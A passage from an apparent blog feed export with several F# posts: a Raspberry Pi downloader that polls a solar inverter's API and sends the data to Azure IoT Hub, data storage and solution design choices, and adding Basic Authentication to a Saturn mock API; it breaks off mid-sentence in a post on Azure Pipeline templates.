Anyway, the structure of this response is quite weird (example) but it’s not too hard to consume The dashboard seems to invoke this approximately every 5 minutes, and given the response is 5 minute time slices, there’s no need to call it more frequently than that Armed with our 4 APIs to call we can start building our application.\nAPI Helpers The API I’m accessing is secured using Basic Authentication, which added an Authorization token to the request that contains a base 64 encoded string of username:password, not super secure, but it’ll do. We’ll make a little helper function to generate that for us:\n1 2 3 4 let getAuthToken username password = sprintf "%s:%s" username password |> ASCIIEncoding.ASCII.GetBytes |> Convert.ToBase64String To access the API I’m using FSharp.Data’s HTTP Utilities and wrapped that up in a function called getData:\n1 2 3 4 5 6 7 8 let getData authToken baseUri (path : string) = let url = Uri(baseUri, path) printfn "Requesting: %s" (url.ToString()) Http.AsyncRequestString ( url.ToString(), httpMethod = "GET", headers = [ Accept HttpContentTypes.Json Authorization (sprintf "Basic %s" authToken) ] ) This function takes the token (output from getAuthToken) and the API base for the inverter, to which we add the specific API path. This little function then wraps up the setting on the appropriate headers and issuing the request to get the JSON response back for us to use.\nStarting the Application When the Downloader starts up it prints out the logo (helps me spot in the logs when it restarts 🤣) and then establishes a connection to Azure IoT Hub.\nEstablishing IoT Client Connections With the solution I either run this locally or on my Raspberry Pi I adjust the way I establish the connection, and importantly, the type of connection. For local development I connect to IoT Hub as a managed device but when it’s on the Raspberry Pi it’s deployed using IoT Edge as a module. I’ll cover both of these topics in greater detail when I do local development and deployments, but know that there’s not a whole lot different in the way you connect, other than one uses the DeviceClient and the other uses the ModuleClient.\nBecause of this, I have a little wrapper around the clients (they don’t share a common base type other than Object) using an F# Record Type and exploiting functions-as-references:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 module IoTWrapper open Microsoft.Azure.Devices.Client open Microsoft.Azure.Devices.Shared type IoTConnectionWrapper = { SendEventAsync : Message -> Async<unit> GetTwinAsync : unit -> Async<Twin> } let getIoTHubClient iotConnStr = async { return! match iotConnStr with | null | "" -> async { let amqpSetting = AmqpTransportSettings(TransportType.Amqp_Tcp_Only) :> ITransportSettings; let! client = [| amqpSetting |] |> ModuleClient.CreateFromEnvironmentAsync |> Async.AwaitTask do! client.OpenAsync() |> Async.AwaitTask return { SendEventAsync = fun msg -> client.SendEventAsync msg |> Async.AwaitTask GetTwinAsync = fun () -> client.GetTwinAsync() |> Async.AwaitTask } } | _ -> async { let client = DeviceClient.CreateFromConnectionString iotConnStr return { SendEventAsync = fun msg -> client.SendEventAsync msg |> Async.AwaitTask GetTwinAsync = fun () -> client.GetTwinAsync() |> Async.AwaitTask } } } getIoTHubClient takes a connection string (which is passed for local development) and uses pattern matching to check if I did provide a connection string (implied local development) or not. 
Side note: I love F# pattern matching!\nUsing the pattern of | null | "" -> allows me to test on a few different outcomes and have them all result in the same block, whereas | _ -> means “anything that wasn’t previously matched. I’m also making extensive use of F# Async Workflows to unwind the C# Task API and make it fit better into F#’s approach to async.\nUsing IoT Twins When it comes to working with an IoT solution the code that is running on the device is likely to be quite generic, after all, it’s deployed to potentially hundreds of devices, so you don’t want to be embedding secrets into the codebase because then you have the same secret everywhere. While I might only have 1 device I’m working with I still didn’t want to embed the username, password and IP address of my inverter in the code (I don’t want that on GitHub!) so I need some way to get them onto the device in a secure manner.\nInitially, I went down the path of setting environment variables on the Docker container when it started to pass them in, but that is quite a bit trickier when it comes to deploying to the IoT devices, instead I decided to use a Device Twin (side note: if you’re using a ModuleClient you’d use a Module Twin, which is the same as a Device Twin but scoped to just that module). A Device Twin is a JSON configuration file for the device that is stored in Azure and can either be updated by the device or through the portal/az cli (and by extension, any third party tooling).\nWithin my Twin I added a new Desired Property with the authentication information for the API:\n1 2 3 4 5 6 7 8 9 10 11 12 13 // snip "properties": { "desired": { "inverter": { "username": "...", "password": "...", "url": "http://..." }, "$metadata": { // and so on } } } Then it’s a matter of getting the Twin info:\n1 2 3 4 5 6 async { let! iotClient = getIoTHubClient iotConnStr let! twin = iotClient.GetTwinAsync() let iotProperties = parseDesiredProperties twin.Properties.Desired parseDesiredProperties is a little function to help unpack the TwinCollection that is returned into a type that is useful for me:\n1 2 3 4 5 open FSharp.Data type DesiredProperties = JsonProvider<""" {"inverter":{"username":"user","password":"pass","url":"http://localhost/"},"$version":4} """> let parseDesiredProperties (data : TwinCollection) = data.ToJson() |> DesiredProperties.Parse You might notice I’m using the JSON Type Provider from FSharp.Data here, I use that a lot to convert the JSON representations back to strongly typed objects.\nNow I can do some partial application to setup the getData function for use multiple times within the application:\n1 2 let token = getAuthToken iotProperties.Inverter.Username iotProperties.Inverter.Password let getData' = getData token (Uri iotProperties.Inverter.Url) What this means is that whenever I need to make an API call I can use getData' which already has the access token and inverter base URI arguments applied.\nPolling APIs The other moderately complex piece is polling each of these APIs on different schedules. I could go down the route of using something like Hangfire but then I would also need to include a SQL Server (or similar) to have the polling managed effectively, and that’d add cost + complexity. 
If I was doing this for multiple devices I’d recommend it, but for a single device that’s primarily for personal use, downtime and lost data isn’t the end of the world.\nInstead, I’m using Async.Start from the F# Async Workflows to spawn a new thread and then running a recursive function, like this:\n1 2 3 4 5 6 7 8 9 let rec dataPoller() = async { match! getLiveData getData' deviceId with | Some liveData -> do! sendIoTMessage iotClient "liveData" correlationId liveData | None -> ignore() do! int(TimeSpan.FromSeconds(20.).TotalMilliseconds) |> Async.Sleep dataPoller() |> Async.Start } dataPoller() |> Async.Start Here I call the livedata API once every 20 seconds (that way with latency, etc. I get about 1 every 30 seconds), use pattern matching against the API wrapper I have, which returns an Option for error handling, and assuming it was successful sends the data to IoT Hub. And why did I use a recursive function? Well, it’s only a recursive function in the fact that the function calls itself, it doesn’t actually pass any data into the new invocation, and we could do this as a loop of some variety, but a recursive function like this is more of a common F# pattern. You might be wondering about stack overflow exceptions, thankfully F# has some pretty good optimisations around recursive functions so I shouldn’t hit it, I’ve had it running for a number of days now resulting in hundreds of thousands of messages, and it hasn’t crashed! … yet\nLinking API Calls Together Each API call is happening in a separate background job, handled by a separate recursive function, all running on different threads, which means that it is difficult to know which message is related to which other messages. I wanted to be able to relate all messages back to a time slice centred around the livedata/list API call, since it’s polled the most infrequently. I do this by using a CorrelationId that is stored in a mutable F# variable. Each time the livedata/list API is called the variable is updated and since the variable is defined before all the recursive functions, each one has access to it via closure scopes.\nI then created a helper function to wrap the call to the IoT client (either ModuleClient or DeviceClient, via the wrapper type I made):\n1 2 3 4 5 6 7 8 let sendIoTMessage<'T> client route correlationId (obj : 'T) = let json = obj |> toS let msg = new Message(Encoding.ASCII.GetBytes json) msg.Properties.Add("__messageType", route) msg.Properties.Add("correlationId", correlationId.ToString()) msg.Properties.Add("messageId", Guid.NewGuid().ToString()) printfn "Submitting %s with correlationId %A" route correlationId client.SendEventAsync msg Here we create a new Message to sent to IoT Hub with a JSON serialised message, then some metadata is added to it, __messageType which is used by the IoT Hub routing to route the message to the right Event Hub, the correlationId to link messages and a unique messageId so that if a message is processed multiple times we can link those processes together.\nKeeping the Application Running The last thing I need the application to do is not exit, since it doesn’t know to wait until the background jobs stop. 
Initially, I was going to rely on Console.ReadLine() and leave it waiting until a newline character was sent, but this doesn’t work if it’s running in a Docker container without stdin attached (ie: a non-interactive container), which is how it’s deployed to the Raspberry Pi.\nConveniently there’s a way that we can test for that, Console.IsInputRedirected, and we can combine it like so:\n1 2 3 4 5 6 printfn "Background jobs running, now we're waiting... " if Console.IsInputRedirected then while true do do! Async.Sleep 300000 else Console.ReadLine() |> ignore Now depending on how our container starts we either wait for a newline character to terminate or the application will run indefinitely.\nConclusion The full codebase for the Downloader is available on GitHub (and I’ve pinned this post to the commit that is HEAD at the time of writing).\nWe’ve seen in this post how we can leverage some F# language features like partial application and pattern matching to tackle some of our goals and seen how we can have credentials/secrets provided to a device without the need to embed them in the application.\nI hope this gives you some insights into the approach I’ve taken to scrape data from my inverter. I’d love feedback on the approach, is there anything that could be done simpler? Doesn’t make sense? Seems overengineered?\n", "id": "2019-06-12-home-grown-iot-data-downloader" }, { "title": "Home Grown IoT - Data", "url": "https://www.aaron-powell.com/posts/2019-06-07-home-grown-iot-data/", "date": "Fri, 07 Jun 2019 10:13:24 +1000", "tags": [ "fsharp", "iot" ], "description": "A look at managing data in an IoT project", "content": "One part of my IoT solution design that I wanted to dive into a bit more in the data side of things because after all, the reason I’m making this project is to capture data.\nThe first question you might want to ask yourself when making an IoT project is where are you going to store the data, this was where I started, but now that I’ve completed the first release I’ve realised that that was the wrong question to have started with, instead I should have asked what was I going to do with the data?\nUsing Your Data Before you choose a storage type and data structure it’s really important to start thinking about just what you will use your data for. Azure has lot of things to choose from such as Time Series Insights, Machine Learning services, Stream Analytics, Power BI or even the humble Excel spreadsheet! You can also build your own dashboards, maybe even some animated charts with React 😉.\nAll of this will influence the decisions that you make around storage and structure.\nFor my solution I have two ways I want to use the data at the moment, first is to generate Power BI reports that allow me to look at trends over time (generation, consumption, etc.), second is to create some custom real-time charts.\nStructuring Your Data Now we’ve got an idea of what we want to do without data it’s time to think about how we will structure it, as that will have an influence on the type of storage that we use.\nFrom my inverter I’m getting three data sets:\nThe labels for the sensors being monitored The values from each monitored sensor The power generated in 5-minute increments (I think… I’m not 100% sure if that’s what it, but that’s what I think it is) The data in 1 & 3 are interesting but the really valuable information is the data from the 2nd API. 
In here it’s broken down into a few valuable groups:\nThe watts, amps and volts per panel group A summary of the watts, amps and volts that went into the inverter A summary of the watts, amps, volts and hertz that went to the grid (I think… It’s called “out” in the API so I’m guessing that’s out of the inverter to the grid) Total generation summary in day, week, month, year and all time There’s a heap of other points that I get back that I don’t understand either (this is an undocumented API after all 🤣).\nWith this in mind, I started to think about the kinds of “questions” I would formulate for the data, such as “what is the power generated by each panel set for the last 30 days?”, “what’s the total in and out?” or “how much power do we use as a household?”. This helped me think about how best to structure the data.\nI decided that I wanted to store the raw message untouched since I don’t use all fields yet (but may in the future), and I want to do this for each API that I call.\nNext, I want to break down the main one into a few groups, Panel Feed and Summary. This is where I use the multiple functions and consumer groups that I described in the solution design.\nFinally, we want to structure our data for the kinds of queries we want to run against it. I made the decision that I would optimise for read in a non-relational manner, meaning I’ll duplicate data across the different structures instead of doing joins. But I do still want to have a loose relationship between each piece of data, so for that I’m generating a correlation ID that is attached to the message so each record can be related if I want.\nChoosing Our Storage Type So let’s take stock, we want to store half a dozen different data structures in a non-relational manner with some basic query support. Oh, and I want it to be cheap (hey, it’s my credit card each month!). With all this in mind I landed on Azure Table Storage.\nSince I’m using F# I have Record Types that represent the different structures:\n1 2 3 4 5 6 7 8 9 type PanelInfo = { [<PartitionKey>] Panel: string [<RowKey>] Id: string MessageId: string Current: float // Iin# Volts: float // Vin# Watts: float // Pin# MessageTimestamp: DateTime // SysTime CorrelationId: string } Source\nYou’ll see here that I have a CorrelationId property, this allows me to trace the panel record (of which I have 2 per message) back to the full data set when it was sent up. I also have a timestamp in there for the message that allows me to group them over time.\nFor each of my data structures I use a different table rather than a combined table. This is mainly so I can look at an individual type and not find data gaps when the structure of each record is different.\nIt’s Not Perfect It’s worth noting though that this isn’t a perfect solution. When I started looking into the Power BI reporting my friend Dom Raniszewski asked me why I was using Table and not Blob, which would be more efficient. And he’s right, there are a number of inefficiencies in how the data is stored for reading in Power BI, but the reason for that is I also wanted an easy programmatic model so I could build my own real-time reporting (Power BI refreshes the data every 24 hours). I’m going to keep it as is for the moment but we’ll see, I may revise it in the future.\nAnd it turns out that future is now, as while writing this post I realised I had a design flaw in the way I’m storing data for retrieval. Since the main view I want is at the day level, not seconds (which is what I capture in), I need some way to view that.
But I can’t do it because the date is a timestamp to the second and Table Storage’s query engine isn’t advanced enough. I’m going to think through how to best address this and retrofit it back into the 30k+ records I already have in storage!\nConclusion Data is often a cornerstone of an IoT project and ensuring you have the right approach to storing it will dramatically improve the benefit you can get from it. As a technologist, your thought might immediately jump to choosing the right database type and then determining how to work your application into it.\nInstead, I’d encourage you to flip the direction, start thinking about what you want to do with your data and then find out what will be the best fit for that.\nFor me Table Storage is the best fit for a number of reasons, but there are still imperfect edges that I’ll have to deal with.\n", "id": "2019-06-07-home-grown-iot-data" }, { "title": "Home Grown IoT - Solution Design", "url": "https://www.aaron-powell.com/posts/2019-06-05-home-grown-iot-solution-design/", "date": "Wed, 05 Jun 2019 09:06:59 +1000", "tags": [ "fsharp", "iot" ], "description": "How I came to the solution design for my IoT project", "content": "Now that I have an idea for the IoT project I want to make, it’s time to think about how to go about building it. As I stated in the prologue I don’t have any experience building a proper IoT project so this was very much a trial-and-error thing. In fact, I actually did about 3 different designs throughout the development of the project and today I want to talk about those different approaches and why certain things were scrapped.\nDesign Fundamentals From the outset I had an idea of what the basic design should look like for the solution.\nThe idea was to have a Raspberry Pi (image courtesy of my colleague Damian Brady) that talks to the inverter and then when it gets the data it’ll push it up to an Azure Function which then lands the data in Azure Table Storage.\nYou might be wondering why I went with Azure Functions over an App Service. Initially it was a decision made purely on cost, I want to run this solution with as little cost to myself as possible, and Azure Functions gives me this. Now, I could’ve used a free-tier App Service instead but as we’ll see through the design evolution I ended up needing more of what Functions provides than just HTTP endpoints.\nThe same goes for the decision to use Table Storage over any other storage in Azure. My data is reasonably structured, but it’s not really relational, so I don’t need a full SQL server. I liked the idea of Cosmos DB as it is essentially a NoSQL database, but it’s really designed for scale well beyond the scale that my little project runs at (minimum throughput is 4000 request units per second and I’m doing 1 request every 20 seconds 🤣). If I was deploying this to monitor multiple residences I’d look at Cosmos, but for my 1 house, the ~$1 per month of Azure Storage will be fine.\nLastly, I needed to make a decision on what language I was going to build in. Given a Raspberry Pi is my deployment target it makes sense to run Linux on it, so I need a language that can run on Linux. I also wanted to have a single language across the whole stack, partially so I could share code (if needed) but more so that I wasn’t jumping back and forth between languages. Azure Functions is the thing I’ll have least control over so it was what drove my decision, but it didn’t really narrow it down much because it supports a lot of languages!
In the end I decided to settle on F# for no reason other than that I love the language and I hadn’t done anything overly complex with it for a while. Oh and with .NET Core I can easily run it on a Raspberry Pi. 😉\nConsidering Security When it came to the design, security was something I was thinking about because, at the end of the day, the last thing you want to do with your IoT project is add another device to a botnet. Because of this I wanted to ensure that my Raspberry Pi would not need to be internet addressable, only that it would be able to communicate out of my network to Azure resources. And this is something that you should always think about when it comes to IoT projects, what are you doing to ensure they can’t be compromised? Are you keeping them off the internet if they don’t need to be? Are you using a VPN to communicate to your home base (cloud or on prem)? Follow the approach of least-privilege, keep things as disconnected as you can and use a push-based model or have the device establish an outbound socket rather than home base searching for the device.\nDesign #1 My first cut of the solution was simple, really simple. My idea was to create a .NET Core console application that I’d rsync over to the Raspberry Pi which would talk to an HTTP endpoint Azure Function. Coincidentally, this is what led me to write this post, as I was just starting to set up my Functions project!\nThis idea was beautifully simple, the console application would do an HTTP GET to the endpoints I’d identified in my inverter and then just POST the response up to an Azure Function which would write it to Table Storage.\nDesign #1.5 Once I was a bit underway with the development I was finding a bit of friction with the way my local workflow went. I’ll do a separate blog about local dev, but ultimately I wanted to have a more predictable local environment relative to production, so I decided to introduce Docker. This is easy for both the console application and Functions as Microsoft provides Docker images for both of them. It also means I don’t have to host my Functions on Azure, I could put them on the Raspberry Pi to reduce latency between the HTTP calls. I ended up not doing that as I didn’t want to put too much load on the Raspberry Pi.\nDesign #2 Everything was tracking along nicely and I started chatting with fellow Advocate Dave Glover, who specialises in IoT. Dave asked me if I’d looked at using IoT Hub as part of my solution, which I had not (I’d only vaguely heard of it and had no idea what it was for other than “IoT” 🤣). And this resulted in a pretty radical overhaul of my architecture.\nAdding IoT Hub Up until now I had been talking directly from the console application to the Azure Functions via HTTP. Introducing IoT Hub into the mix drastically changes this, rather than talking to the Functions I talk to IoT Hub, which has an event stream that I can consume. IoT Hub also allows you to send messages to the device from Azure which would be useful if you need to update configuration on the fly. There’s a number of overlaps between IoT Hub and Event Hubs since both are streams that you consume messages from (and in IoT Hub you actually subscribe to an Event Hub to get the messages).\nAnd of course Azure Functions has IoT Hub bindings, meaning that we can easily consume those messages. Now our design looks like this:\nNow we’re no longer talking directly to the Function, instead we’re pushing into the IoT Hub message stream and the Function will run whenever a new message comes in.
This would allow the solution to scale up much faster than it previously could, and it also means that if for some reason the Function App goes offline (such as when it’s deployed) I don’t drop messages, they’ll just sit in the stream until they get consumed. This is also where my decision to use Functions over App Services paid off, as I don’t need any HTTP endpoints in my Functions anymore, they will all just use the IoT Hub bindings.\nHandling Multiple Message Types When I was POSTing to different HTTP endpoints in my Functions application it was easy to handle the different data structures that I get back from the inverter (I have 3 endpoints I monitor there). But moving to IoT Hub changed this, I no longer talk to the Function directly, I only pump messages into a message stream, so how do we handle different structures?\nIt’s time to look at message routing in IoT Hub. Routing does what it sounds like it does: it provides you with the tools to send messages to different places depending on rules that you provide to it. Through a Route you can redirect the message from the IoT Hub stream to a secondary Event Hub, Service Bus Queue, Service Bus Topic or Blob Storage.\nThe way you create a Route is to define a message query against something that is important on the message, either properties of the message or the message body itself. For example, if you were monitoring a temperature sensor and received a message where a threshold was exceeded you could send that message to a high priority stream rather than the primary stream.\nFor me, because each message body is so radically different, I add a special property to the message before it is sent to IoT Hub that indicates the type of message. I then redirect this to one of several different Event Hubs so that the Functions can subscribe to only the correct one and handle only a single data type (there’s a rough sketch of what one of these routes looks like just below the complete design).\nHandling a Message Multiple Times The final thing I wanted to do with the new Event Hub-based Functions was shard the data a little bit. One of the endpoints that I monitor contains a lot of data that I want to look at more finely, in particular, split out the two panel groups so I can report on each independently.\nThis means I either have to have one large Function that does many different things, or I have to read the message multiple times. Now, you can’t actually read the message multiple times, it’s a FIFO (First In, First Out) model, so you need to set up a Consumer Group-per-Function so that each Function has its own view of the message. It also means that we won’t use the IoT Hub binding for Azure Functions but the Event Hubs bindings instead (which are really just the same) and provide the appropriate Consumer Group to the binding.\nComplete Design I now have all the pieces of the puzzle connected up and it looks like this:\nMy Raspberry Pi talks to the inverter and then sends the message up to IoT Hub with a tag on it indicating the type of message. IoT Hub will then route the message based on the type to one of 3 Event Hubs (all within the same Event Hub Namespace). These Event Hubs have a consumer group-per-Function so that my Azure Functions can shard the messages into different tables in Table Storage!
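As promised, here's a rough sketch of what one of those routes can look like when expressed as the routing fragment of an IoT Hub ARM template. This is illustrative only, not the actual configuration from my deployment: the route and endpoint names are made up, although the __messageType property is the one the Downloader adds to each message before sending it.

```json
{
  "routing": {
    "routes": [
      {
        "name": "live-data-route",
        "source": "DeviceMessages",
        "condition": "__messageType = 'liveData'",
        "endpointNames": [ "live-data-eventhub" ],
        "isEnabled": true
      }
    ]
  }
}
```

The condition is just a query over the properties of the message, so anything the device adds (like __messageType) can be used to decide which Event Hub endpoint (defined separately under the routing configuration) the message ends up in.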
There may be a lot more moving parts in it than I had originally thought I’d have, but each of them plays an important role: IoT Hub allows me to consume messages without worrying about processing them, Event Hubs lets me direct messages to different consumption points, Azure Functions can process the data at scale (which I don’t need, but is important in IoT) and finally Table Storage gives me unstructured data storage that I can report on in the future.\nSo what do you think of the design? Anything you think I’ve missed? Anything that’s overthought?\n", "id": "2019-06-05-home-grown-iot-solution-design" }, { "title": "Home Grown IoT - Prologue", "url": "https://www.aaron-powell.com/posts/2019-05-30-home-grown-iot-prologue/", "date": "Thu, 30 May 2019 08:06:52 +1000", "tags": [ "fsharp", "iot" ], "description": "Some beginning words on the Home Grown IoT project I've been working on for a while", "content": "I’ve always been a bit of a hardware tinkerer. Growing up my dad would bring home old radios, telephones and other electronics from work and hand them to me along with a screwdriver and multimeter and let me poke around with them. I had an electronics kit that had all kinds of sensors, lights and switches that you could connect together to make whatever you wanted to make. We had breadboards, wires, soldering irons, resistors, capacitors, LEDs, switches and everything in between to make random little pieces of electronics.\nWhen we got our first computer, a 486 66 DX (with a turbo button!), I pulled it apart, with strict instructions to a) know where the cables went and b) no soldering irons! I helped set up our home token ring network and eventually wire our house with ethernet.\nSo when cheap, consumer-grade IoT became prevalent with Raspberry Pis and Arduinos it seemed only natural that I’d grab some myself and play around with them.\nAnd I did what everyone does with an IoT device…\nSource @ThePracticalDev\nSeriously, I have a Pi that is somewhere in my house, I’m unsure where though, it’s just in a box somewhere. Similarly, I have a bunch of NodeMCU chips which have 4MB memory, 16 pins and wifi that just sit on a shelf gathering dust.\nThe problem I have when it comes to IoT projects is that I just have no idea what to make, and that is half the battle.\nSparking an Idea At the end of 2018 my wife and I decided to get solar panels put on our roof. We got a total of 18 panels that have a peak output of 5.5kW, more than enough energy production for our home needs. We also got an inverter, an ABB UNO-DM series inverter, to connect the panels to our mains and push excess power generated back to the grid.\nThe interesting thing about inverters these days is that pretty much all of them come with a built-in wifi endpoint, which of course ours does. I connected it to the wifi and was presented with some dashboards.\nWell, that’s pretty nifty isn’t it?\nBut I’m a dev at the end of the day, so what do I do next? Fire up the dev tools of course!\nAnd what I found was that the dashboard is just an AngularJS application over a series of HTTP endpoints secured with basic authentication. What’s more is that the data is just basic JSON payloads!\nMy Home Grown IoT Project I now have something sitting on my home network that is generating interesting data, and what’s more it’s running a web server that I can connect to using an authentication model I can implement with very little effort.\nThis gives me something to aim for.
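Just to make that concrete, here’s a minimal sketch of what pulling that JSON from the inverter could look like in F#, assuming a hypothetical endpoint path and placeholder credentials (the real endpoints are specific to the ABB dashboard):

open System
open System.Net.Http
open System.Net.Http.Headers
open System.Text

// GET one of the inverter's JSON endpoints using basic authentication.
let getInverterData (baseAddress : string) (username : string) (password : string) =
    async {
        use client = new HttpClient(BaseAddress = Uri baseAddress)
        let token = Convert.ToBase64String(Encoding.UTF8.GetBytes(sprintf "%s:%s" username password))
        client.DefaultRequestHeaders.Authorization <- AuthenticationHeaderValue("Basic", token)
        // "/v1/livedata" is a made-up path for illustration, not the inverter's real endpoint
        let! json = client.GetStringAsync "/v1/livedata" |> Async.AwaitTask
        return json
    }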
My goals for the project were as follows:\nCreate a solution that can run on a Raspberry Pi to pull the data from my inverter\nStore the data somewhere\nCreate my own dashboards to view the power generated\nSee what else is interesting in the data\nSince this would be my first foray into a proper IoT project I wanted to do it right. I wanted an easy local development experience, including being able to develop when I’m not at home; I wanted it to be easy to deploy; I wanted to avoid exposing my Pi (or inverter) to the public internet.\nSo over the last few months I’ve slowly chipped away at it and have finally deployed Sunshine, my solar panel monitoring system! The code is up on GitHub if you wish to have a poke around, but it’s designed around my setup, so it’s not really a general purpose solution. At its core it’s a .NET Core application (written in F#) that runs on Docker, using Azure IoT Hub for device connectivity, Azure IoT Edge to deploy with Azure Pipelines and data processing with Azure Functions.\nThroughout this series I’m going to go through how I went about building the project, the technologies I’ve used, the decisions I made and why I made them. I’ve learnt a lot building this (I’ve overhauled it majorly a few times 🤣) and hopefully it’ll give you some pointers on where to go with your own IoT projects.\n", "id": "2019-05-30-home-grown-iot-prologue" }, { "title": "Extending Saturn to support Basic Authentication", "url": "https://www.aaron-powell.com/posts/2019-05-27-implementing-basic-auth-on-saturn/", "date": "Mon, 27 May 2019 15:44:22 +1000", "tags": [ "fsharp" ], "description": "A guide on extending Saturn, an F# web framework, by creating a Basic Authentication provider", "content": "Recently I needed to create a mock API for local development on a project and I decided to use Saturn, which describes itself thusly:\nA modern web framework that focuses on developer productivity, performance, and maintainability\nSaturn is written in F#, and given this whole project is F# it seemed like a logical fit. There’s a getting started guide, so I won’t go over that, instead I’ll focus on something I needed specifically for this project, Basic Authentication, because the API I was mocking uses that under the hood and I wanted to simulate that.\nExtending Saturn Applications Conceptually, Saturn uses Computation Expressions for abstracting away the ASP.NET pipeline and giving you a very clean F# syntax for defining your application.\nI wanted to make the application definition work like this:\nlet app = application { use_basic_auth // the rest of our app setup url (sprintf "http://0.0.0.0:%d/" port) } And to do this we’ll need to create a custom operation on Saturn’s ApplicationBuilder. Thankfully, F# makes it very easy to extend types you don’t own, so let’s get started:\ntype ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth(state : ApplicationState) = state We’ll define our new custom operation on the application computation expression, call it use_basic_auth, and it will execute the defined function, which has a signature of ApplicationState -> ApplicationState.\nAdding middleware The first thing we’re going to need to do is to edit the middleware that Saturn uses to include authentication, and since it’s ASP.NET Core under the hood we need to add its middleware for Identity.
Let’s update our UseBasicAuth function:\ntype ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth state = let middleware (app : IApplicationBuilder) = app.UseAuthentication() { state with AppConfigs = middleware::state.AppConfigs } That was easy! We’ve added a new function called middleware that adds the authentication middleware to the pipeline. Then we use the :: (cons) operator to add our middleware to the head of the middleware collection and create a new record using the current ApplicationState, just updating the AppConfigs property.\nImplementing Basic Authentication With Authentication enabled in our pipeline, we next need to tell it what kind of authentication we want to use and how to actually handle it!\ntype ApplicationBuilder with [<CustomOperationAttribute("use_basic_auth")>] member __.UseBasicAuth state = let middleware (app : IApplicationBuilder) = app.UseAuthentication() let service (s : IServiceCollection) = s.AddAuthentication("BasicAuthentication") .AddScheme<AuthenticationSchemeOptions, BasicAuthHandler>("BasicAuthentication", null) |> ignore s.AddTransient<IUserService, UserService>() |> ignore s { state with ServicesConfig = service::state.ServicesConfig AppConfigs = middleware::state.AppConfigs } Now we have a service function that takes the IServiceCollection, adds the Authentication service as BasicAuthentication (so the pipeline knows it’s that type), adds the handler (a type called BasicAuthHandler) and also registers a type in the Dependency Injection framework for accessing our users. We then modify our record on return with this new function and it’s good to go!\nImplementing the Basic Authentication Handler Ok, we’re not quite done yet, we should have a look at how we actually implement the Basic Authentication handler in the BasicAuthHandler type, and our user store.\nLet’s start with the user store, since I’ve done it quite simply, after all, it’s for a mock:\ntype IUserService = abstract member AuthenticateAsync : string -> string -> Async<bool> type UserService() = let users = [("aaron", "password")] |> Map.ofList interface IUserService with member __.AuthenticateAsync username password = async { return match users.TryGetValue username with | (true, user) when user = password -> true | _ -> false } Yep, nothing glamorous here, I’ve just created a type that tests for a user and password in memory. In a non-mock system you might want to implement it more securely, but it does what I need for now.
😉 I’ve also created this as an interface so that I can inject it as a dependency, or I could mock it if I was to write tests (Narrator: He didn’t write tests).\nNow that we have a way to validate a user’s credentials it’s time to implement the class that will handle authentication, BasicAuthHandler:\ntype BasicAuthHandler(options, logger, encoder, clock, userService : IUserService) = inherit AuthenticationHandler<AuthenticationSchemeOptions>(options, logger, encoder, clock) This type inherits from AuthenticationHandler within the ASP.NET Core framework and will require us to implement the HandleAuthenticateAsync function to be useful, so let’s start there:\ntype BasicAuthHandler(options, logger, encoder, clock, userService : IUserService) = inherit AuthenticationHandler<AuthenticationSchemeOptions>(options, logger, encoder, clock) override this.HandleAuthenticateAsync() = task { return AuthenticateResult.Fail "Not Implemented" } Side note: I’m using the TaskBuilder.fs package to create a Task<T> response using the task computation expression.\nThis function is executed on every request as part of the middleware pipeline and I’m going to need to ensure that the Authorization header is provided and it has a valid Basic Auth token in it. Let’s start by ensuring the header exists with a match expression:\noverride this.HandleAuthenticateAsync() = let request = this.Request match request.Headers.TryGetValue "Authorization" with | (true, headerValue) -> task { return AuthenticateResult.Fail("Not implemented") } | (false, _) -> task { return AuthenticateResult.Fail("Missing Authorization Header") } The pattern matching will just check that we have the header and break into the appropriate block if the header exists; if it doesn’t we’ll just fail the challenge, resulting in a 401 response.\nTo validate the token I’m going to start with a quick function to unpack it like so:\ntype Credentials = { Username: string Password: string } let getCreds headerValue = let value = AuthenticationHeaderValue.Parse headerValue let bytes = Convert.FromBase64String value.Parameter let creds = (Encoding.UTF8.GetString bytes).Split([|':'|]) { Username = creds.[0] Password = creds.[1] } This will just decode the encoded string into a username:password pair that I return as a record (you could use an anonymous record type or a tuple, entirely up to you). Now we can validate it with our IUserService:\noverride this.HandleAuthenticateAsync() = let request = this.Request match request.Headers.TryGetValue "Authorization" with | (true, headerValue) -> async { let creds = getCreds headerValue.[0] let!
userFound = userService.AuthenticateAsync creds.Username creds.Password return match userFound with | true -> let claims = [| Claim(ClaimTypes.NameIdentifier, creds.Username); Claim(ClaimTypes.Name, creds.Username) |] let identity = ClaimsIdentity(claims, this.Scheme.Name) let principal = ClaimsPrincipal identity let ticket = AuthenticationTicket(principal, this.Scheme.Name) AuthenticateResult.Success ticket | false -> AuthenticateResult.Fail("Invalid Username or Password") } |> Async.StartAsTask | (false, _) -> task { return AuthenticateResult.Fail("Missing Authorization Header") } We’ll use another match against the result of our IUserService.AuthenticateAsync (which uses F# async), and if the user is valid we’ll create a claim ticket and return that to the pipeline successfully for the request to continue.\nWiring it up with our router It’s now time to add authentication over the route(s) that we want to have authentication on, and we do that with the router computation expression. We’ll start with a pipeline:\nlet matchUpUsers : HttpHandler = fun next ctx -> next ctx let authPipeline = pipeline { requires_authentication (Giraffe.Auth.challenge "BasicAuthentication") plug matchUpUsers } On the pipeline we set the requires_authentication operation to a BasicAuthentication challenge from Giraffe (the web framework Saturn builds on top of).\nFinally, it’s time for our router:\nlet webApp = router { pipe_through authPipeline // define routes } Conclusion The computation expression design of Saturn is really neat; you can just extend the type that represents the part of Saturn that you want to extend. Through this we can add a custom authentication provider quite easily.\nHopefully this helps others looking to extend Saturn. 😊\n", "id": "2019-05-27-implementing-basic-auth-on-saturn" }, { "title": "Azure Pipeline YAML Templates and Parameters", "url": "https://www.aaron-powell.com/posts/2019-05-24-azure-pipeline-templates-and-parameters/", "date": "Fri, 24 May 2019 11:56:00 +1000", "tags": [ "azure-devops" ], "description": "Using parameters with job templates in Azure Pipelines", "content": "I’m currently building a project that uses Azure Pipelines, specifically the YAML Pipeline so that I can have it in source control.\nBut the Pipeline has a number of tasks that I have to execute multiple times with different parameters, so I grouped them into a job and just copy/pasted them the 3 times I needed. This was a quick way to get it tested and working, but as I modified the Pipeline I’d have to do the modification multiple times, which was a bit annoying (a few times I forgot to replicate the change and broke the build!).\nEnter Templates In the past I’ve used Task Groups in the visual Pipeline builder to extract a common set of tasks to run multiple times. With YAML we have Templates which work by allowing you to extract a 